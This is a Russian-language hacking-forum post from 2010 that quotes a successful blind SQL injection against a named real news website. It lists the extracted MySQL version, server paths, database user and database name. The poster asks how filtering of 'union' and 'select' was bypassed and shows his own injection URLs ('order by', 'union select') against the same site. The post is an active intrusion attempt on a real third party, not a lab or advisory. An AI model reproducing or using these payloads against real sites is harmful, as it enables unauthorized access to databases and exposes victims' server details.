03.04.2010, 16:21
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Pashkela
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5
@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки Pashkela как ты обошел фильтрацию, чтобы вытянуть это:
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
version(): 5.1.44
http://www.lavozindependiente.com/microsite.php?cha=66+order+by+3+--+
http://www.lavozindependiente.com/microsite.php?cha=-66+union+select+1,2,3+--+
Я пробовал, у меня не получается.
|
|
|